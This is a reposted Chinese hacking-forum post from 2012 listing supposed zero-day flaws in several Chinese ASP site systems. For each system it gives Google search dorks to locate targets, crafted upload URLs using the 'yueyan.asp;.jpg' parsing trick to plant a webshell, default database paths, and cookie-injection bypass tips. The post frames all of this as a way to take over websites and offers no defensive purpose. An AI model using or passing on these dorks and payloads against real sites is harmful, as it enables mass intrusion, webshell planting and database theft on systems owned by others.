查看: 10177|回复: 2

大家赶紧的多个0day (下)---转载

[复制链接]
发表于 2012-7-13 13:46:45 | 显示全部楼层 |阅读模式
本帖最后由 tianyueabc 于 2012-7-13 13:54 编辑

网纪互联公文签收系统司法版通杀上传漏洞
网纪互联公文签收系统司法版通杀上传漏洞
google搜索:inurl:qtdisp.asp?disp_id=
源码根目录漏洞文件in_file.asp 可以自定文件
漏洞文件:in_file.asp
构造语句:in_file.asp?file_name=yueyan.asp;
上我们的图片jpg格式木马
webshell 路径为:upfile/yueyan.asp;.jpg
漏洞分析:同这个0day差不多,原理相同

某新闻发布系统漏洞
无意发现一个站有注入 然后找下关键字发现是某套程序然后找了下关键字
关键字:inurl:  onews.asp?id=
有些是加入了防注入代码 但大部分都没过滤cookies 可以注入中转下。
php的注入漏洞和上传是非常好挖的,只要你在拿站是多留意下建站系统呀,getshell方法呀。。。。
多注意就会发现,有很多漏洞都是通用的。
中国是山寨大国,这些建站系统都是这个抄袭哪个,哪个抄袭这个的,瞬间无语了。,
康城公司注册类网站系统
康城公司注册类网站系统 v9.6
关键字:inurl:company.asp?title=
数据库:Databases/kangchengiop.mdb
或者Databases/kangcheng.mdb
cookies 注入中转
后台拿shell
cookies 名小子 可以上传
ewe 修改样式
数据库备份
插一句 建议不使用!!

NowShop商城系统上传0day

上传页面:admin/upload.asp
上传语句构造:admin/upload.asp?fuptype=db&fupname=yueyan.asp;&frmname=yueyan.asp
本地上传:yueyan.jpg
具体就不说明了。。。

评分

参与人数 1i币 +20 收起 理由
s0mewhat + 20

查看全部评分

回复

使用道具 举报

发表于 2012-7-18 11:31:34 | 显示全部楼层
学习中,还不知道怎么用。。
回复 支持 反对

使用道具 举报

发表于 2013-10-21 20:45:15 | 显示全部楼层
支持 了、   
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-7 05:03 , Processed in 0.025055 second(s), 13 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部